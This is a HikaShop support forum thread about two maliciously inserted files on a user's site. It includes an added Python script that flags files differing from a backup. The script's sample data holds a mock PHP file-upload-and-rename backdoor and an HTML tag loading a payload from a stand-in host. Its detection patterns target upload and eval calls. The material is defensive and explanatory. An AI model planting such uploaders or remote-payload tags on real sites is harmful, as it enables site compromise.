File Insertion

  • Posts: 25
  • Thank you received: 2
8 years 6 months ago #256871

-- HikaShop version -- : 2.6.4

Hi Hikashop,

Have recently discovered 2 Hikashop files modified on my site but not by me:

1. /administrator/components/com_hikashop/extensions/mail.php
I checked the last backup and this file didn't exist in this location. The content of the file is a PHP code to upload, move and rename a file.

2. /administrator/components/com_hikashop/extensions/plg_hikashop_massaction_category/indexa.html
I deleted this file because it contains a URL to a malware source file.

What should I do with the mail.php file? Is it a legitimate hikashop file in the right place, or was it maliciously inserted?

Also does this mean there's an open vulnerability in Hikashop 2.6.4 for the insertion to happen?

Thank you =)


  • Posts: 83932
  • Thank you received: 13588
  • MODERATOR
8 years 6 months ago #256886

Hi,

Both of these files don't exist by default in HikaShop.
So they were indeed maliciously inserted.
Does that mean that there is an open vulnerability on your website? It's highly likely yes. Maybe you updated your extensions/Joomla in the meantime and that vulnerability has been closed already. The best would be to contact a security specialist like aesecure in order to check on it.
Does that mean that there is an open vulnerability on HikaShop 2.6.4? Not at all. It could be, but in that case, it would likely have already been reported and fixed, and many other websites would have been infected, especially ours.
So far, we had only one security issue reported and fixed in 7 years (and it was a few years ago). We try really hard to code in a secure way.

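The check the moderator describes (a file is suspect when it is not in the stock install or the last good backup) can be scripted. The following is an added example, not HikaShop code: it diffs the current site tree against a backup manifest and flags additions or changes, with content heuristics modelled on the two files reported above. Paths, file contents and the `example.invalid` URL are constructed sample data.

```python
import re
from pathlib import PurePosixPath

# Constructed sample data: the "last backup" (path -> content) and the current
# site tree. Contents are stand-ins, not real HikaShop files.
BACKUP_SITE = {
    "administrator/components/com_hikashop/extensions/plg_hikashop_massaction_category/index.html":
        "<!DOCTYPE html><title></title>",
    "administrator/components/com_hikashop/helpers/helper.php": "<?php defined('_JEXEC') or die;",
}
CURRENT_SITE = dict(BACKUP_SITE)
CURRENT_SITE.update({
    # The two files from the thread: neither exists in the backup
    "administrator/components/com_hikashop/extensions/mail.php":
        "<?php move_uploaded_file($_FILES['f']['tmp_name'], 'x.txt'); rename('x.txt', $_GET['n']);",
    "administrator/components/com_hikashop/extensions/plg_hikashop_massaction_category/indexa.html":
        '<script src="http://example.invalid/payload.js"></script>',
})

# Content heuristics applied only to files that are new or changed
PHP_FILE_PRIMITIVES = re.compile(r"\$_FILES|move_uploaded_file|rename\s*\(|copy\s*\(|eval\s*\(")
EXTERNAL_URL = re.compile(r"https?://[^\s\"'<>]+")

def find_unexpected_files(backup_site, current_site):
    """Return (path, reason) for every current file absent from or differing from the backup."""
    findings = []
    for path in sorted(current_site):
        content = current_site[path]
        if path not in backup_site:
            reason = "not in backup"
        elif backup_site[path] != content:
            reason = "differs from backup"
        else:
            continue  # identical to the known-good copy
        suffix = PurePosixPath(path).suffix.lower()
        if suffix == ".php" and PHP_FILE_PRIMITIVES.search(content):
            reason += "; PHP uses file upload/move primitives"
        elif suffix in (".html", ".htm") and EXTERNAL_URL.search(content):
            reason += "; HTML references external URL " + EXTERNAL_URL.search(content).group(0)
        findings.append((path, reason))
    return findings

if __name__ == "__main__":
    for path, reason in find_unexpected_files(BACKUP_SITE, CURRENT_SITE):
        print(f"{path}: {reason}")
```

On a real site, build the two dicts by walking the backup archive and the live web root and reading each file; a flagged file still needs manual review before deletion, since legitimate updates also change files.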

  • Posts: 25
  • Thank you received: 2
8 years 6 months ago #257001

Hi nicolas,

Noted your advice, I will get the hosting provider to assist on the matter since it's not a HikaShop vulnerability.

Thank you =)
